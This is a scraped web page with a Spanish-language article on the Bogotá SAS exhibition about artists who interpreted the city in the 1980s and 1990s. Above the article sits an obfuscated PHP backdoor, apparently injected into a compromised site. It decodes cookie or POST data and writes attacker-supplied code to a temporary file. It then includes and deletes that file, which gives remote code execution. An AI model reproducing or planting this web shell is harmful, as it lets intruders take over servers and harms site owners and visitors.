$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> Bogotá SAS – www.interferencechannel.com

Bogotá SAS

Bogotá SAS es una investigación sobre artistas que interpretaron la CIUDAD entre las décadas de 1980 y 1990. Es una exposición que nos plantea preguntas en torno al espacio público y el uso del suelo. Es una retrospectiva que rescata cuestionamientos sobre el sentido de la propiedad.

Elegimos Bogotá SAS para ser la exposición referente de nuestra editorial sobre la INTERFERENCIA por su capacidad de hacernos reflexionar sobre el sentido del arte. Allí encontramos su forma de reacción en periodos de crisis urbana y social y podemos entrever  al verdadero interferente: el artista.

“A pesar de lo que muchos quieren o buscan, el rol de arte no es armonizar sino justamente lo contrario, ir a destiempo, ser estridentes, interferir.“¹ 

CaldodeCultivo, Comanche, Tarjeta postal para la exposición Bogotá SAS, 2015.

Rafael Chaparro, “Bogotá subcultural” (detalle), publicada en La Prensa el 19 de septiembre de 1989

Keshava Liévano, “El humor contamina el miedo ambieNNte” 1989

Gustavo Zalamea, Trancón 1995

Camara de Comercio de Bogotá, entre el 4 de junio y el 10 de Julio.

¹Cristina Lleras

 

Comments are closed.